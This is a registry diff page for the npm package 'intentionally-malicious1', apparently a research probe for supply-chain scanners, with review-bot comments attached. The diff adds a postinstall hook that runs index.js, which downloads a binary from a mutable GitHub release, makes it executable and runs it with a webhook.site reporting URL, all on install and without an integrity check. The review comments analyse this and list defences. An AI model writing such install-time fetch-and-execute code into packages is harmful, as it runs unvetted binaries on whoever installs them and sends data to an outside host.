intentionally-malicious1 0.0.1-security → 1.0.1
Potentially problematic release.
This version of intentionally-malicious1 might be problematic.
- package/README.md +5 -3
- package/index.js +24 -0
- package/package.json +12 -3
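--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +1,7 @@
-#
+# Intentionally Malicious
 
-This
+This is a package wrapper of "malware" that executes inside supply chain defense pipelines to
+test for SSRF opportunities, done by [@ex0dus-0x](https://codemuch.tech).
+Please reach out to chat more if this entered your pipeline!
 
-
+The original malware: https://github.com/ex0dus-0x/sneak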
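--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,24 @@
+const request = require('request');
+const fs = require('fs');
+const exec = require('child_process').exec;
+
+const url = "https://github.com/ex0dus-0x/sneak/releases/download/prerelease/sneak"
+const file = fs.createWriteStream("sneak");
+request({
+followAllRedirects: true,
+url: url
+}, function (error, response, body) {
+request(url).pipe(file).on('close', function() {
+console.log("done");
+exec('chmod +x ./sneak && ./sneak -webhook=https://webhook.site/646059aa-6165-44dd-bc5b-143f0e13cdc3?', (err, stdout, stderr) => {
+if (err) {
+console.log(err);
+return;
+}
+console.log(`stdout: ${stdout}`);
+console.log(`stderr: ${stderr}`);
+});
+});
+});
+
+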
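Review bot: The `exec` call on new line 13 runs a binary that was just fetched from a mutable release tag (`prerelease`) with no integrity check, so whatever that asset is at install time is what executes on the installing host, whoever controls the release by then. If this is meant as a controlled test, the file should open with a comment such as `// Test payload: downloads the sneak binary, runs it, and reports to the webhook URL below`, and the download should be compared against a pinned digest before `chmod`. The outer `request` callback never inspects `error` or `response` and fetches the URL a second time, so a failed first request does not stop the flow. For anyone triaging an install of this version, the artefacts visible in this file are a `sneak` file in the working directory, a shell child of `node` running `chmod +x ./sneak`, and outbound requests to the GitHub release URL and to `webhook.site`.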
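--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,15 @@
 {
 "name": "intentionally-malicious1",
-"version": "
-"description": "
-"
+"version": "1.0.1",
+"description": "Definitely malware.",
+"main": "index.js",
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1",
+"postinstall": "node index.js"
+},
+"author": "Alan Cao <alcao758@gmail.com>",
+"license": "ISC",
+"dependencies": {
+"request": "^2.88.2"
+}
 }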
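Review bot: The added `"postinstall": "node index.js"` entry on new line 8 runs the package's script on every install, which turns dependency resolution into code execution on the installing host, and nothing in the script name hints that `index.js` downloads and runs a binary. Installing with `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) keeps this hook from running, and a build sandbox without outbound network access limits what it can do if it does run. The new `request` dependency is deprecated upstream, which is worth noting when auditing what else this install pulls in.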